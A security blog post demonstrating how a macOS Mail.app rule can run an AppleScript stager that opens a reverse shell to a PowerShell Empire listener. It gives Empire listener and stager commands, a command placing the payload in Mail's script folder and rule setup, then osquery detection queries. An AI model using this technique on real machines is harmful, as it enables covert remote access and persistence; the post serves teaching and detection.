This blog post is going to demonstrate a proof of concept (PoC) of sending an e-mail to trigger the Mail app (mail.app) to create a reverse shell. The Mail app has built-in functionality that can trigger an Applescript to execute code when certain conditions (new e-mail in inbox from bob, deletion of e-mail, or an e-mail containing certain text) occur within the Mail app. This functionality provides a method to initiate a reverse shell without user interaction or placing a persistent mechanism in a well-known location. The method below will utilize this functionality to monitor e-mails from a particular user, upon receiving an e-mail from said user, a reverse shell will call back to our Powershell Empire server.

DISCLAIMER

The information contained in this blog post is for educational purposes ONLY! HoldMyBeerSecurity.com/HoldMyBeer.xyz and its authors DO NOT hold any responsibility for any misuse or damage of the information provided in blog posts, discussions, activities, or exercises. 

DISCLAIMER

Background

Mail.app mail rules

You can attach an AppleScript script to a Mail rule. For example, you could have an incoming message trigger a script that copies information from the message and pastes it into a database that works with Script Editor. In this blog post, we are going to use this functionality to execute a script to create a reverse shell.

Powershell Empire

Empire is a post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent. It is the merge of the previous PowerShell Empire and Python EmPyre projects. The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

Install/Setup Powershell Empire

Install Empire

1. Spin up a Kali Linux VM
2. apt-get update -y && apt-get upgrade -y
3. cd /opt
4. git clone https://github.com/BC-SECURITY/Empire.git
5. cd Empire
6. ./setup/install.sh
7. ./empire

Create listener

1. listeners
2. uselistener http
   1. set Name http80
   2. set Port 80
   3. execute
3. listeners
4. back

Generate Applescript stager with Empire

1. usestager osx/applescript
   1. set Listener http80
   2. set OutFile /tmp/applescript
   3. execute
2. cat /tmp/applescript
3. Copy the above output

Configuring Mail.app

Since this script can be used for nefarious activity, I will not be demonstrating any methods to automate enabling this script from the command line. This section will demonstrate how to place this script in the proper location with the terminal but will use the GUI to enable our script. Additionally, to prevent the weaponization of this technique this section is missing steps to make this PoC work.

1. echo "<contents of Empire payload above>" > ~/Library/Application\ Scripts/com.apple.mail/ps_empire.scpt
2. Open Mail.app
3. Login into an e-mail account
4. Select Mail > Preferences >Rules
5. Select “Add rule”
   1. Enter “Empire-shell” for description
   2. Rule conditions
      1. Select “From”, “is equal to”, and enter an e-mail
   3. Rule actions
      1. Select “Run AppleScript” and “ps_shell”
   4. Select Ok

Sending the e-mail

1. Select “New message” in the top left
2. Enter “<YOUR e-mail>” into To:
3. Enter “Test” into the subject
4. Enter “test” into the body
5. Send e-mail

Remediations

Host-based detection

Principle of least privilege

The principle of least privilege is the biggest deterrent against this technique. This technique requires administrative privileges to copy the script into the directory.

Osquery

Process monitoring

From my testing, it seems that our malicious AppleScript is executed as a child process of UserScriptService. I ASSUME that when an app like Mail.app runs an Applescript it makes an internal API call to this process to execute the script. The child process spawned by UserScriptService has a -T flag which specifies the application that made the request to spawn this AppleScript. The query below starts by querying the process table for the PID of Mail. Next, it queries the process_events table for all the command lines that initiated a process that have a prefix of “osascript”. Finally, the query extracts the parent PID from any processes starting  with “osascript” and compares the PID to the Mail app PID. Effectively this query is looking for any Applescript initiated by Mail.app

1. SELECT * FROM process_events WHERE cmdline like '%osascript%' AND trim(substr(cmdline,23,5)) like (SELECT pid FROM processes WHERE name='Mail');

Creation and modification date

With Osquery we can query the following directory ~/Library/Application Scripts/com.apple.mail for recent modifications.

1. SELECT f.path, datetime(f.mtime,'unixepoch') AS file_last_modified_time, datetime(f.ctime,'unixepoch') AS file_last_status_change_time, datetime(f.btime,'unixepoch') AS file_created_time, ROUND((f.size * 10e-7),4) AS size_megabytes FROM file f LEFT JOIN users u ON f.uid = u.uid LEFT JOIN groups g ON f.gid = g.gid WHERE path like "/Users/%/Library/Application Scripts/com.apple.mail/%';

Decompile Applescript binary

1. file <file path to file>
2. osadecompile <file path to file>

DISCLAIMER

The information contained in this blog post is for educational purposes ONLY! HoldMyBeerSecurity.com/HoldMyBeer.xyz and its authors DO NOT hold any responsibility for any misuse or damage of the information provided in blog posts, discussions, activities, or exercises. 

DISCLAIMER

References

• Compiling Applescript from command line
• Introduction to Applescript: Hello World
• Use scripts as rule actions in Mail on Mac
• Github – EmpireProject/Empire
• Reading AppleScript source code with osadecompile
• The file table in osquery is amazing!
• Process and socket auditing with osquery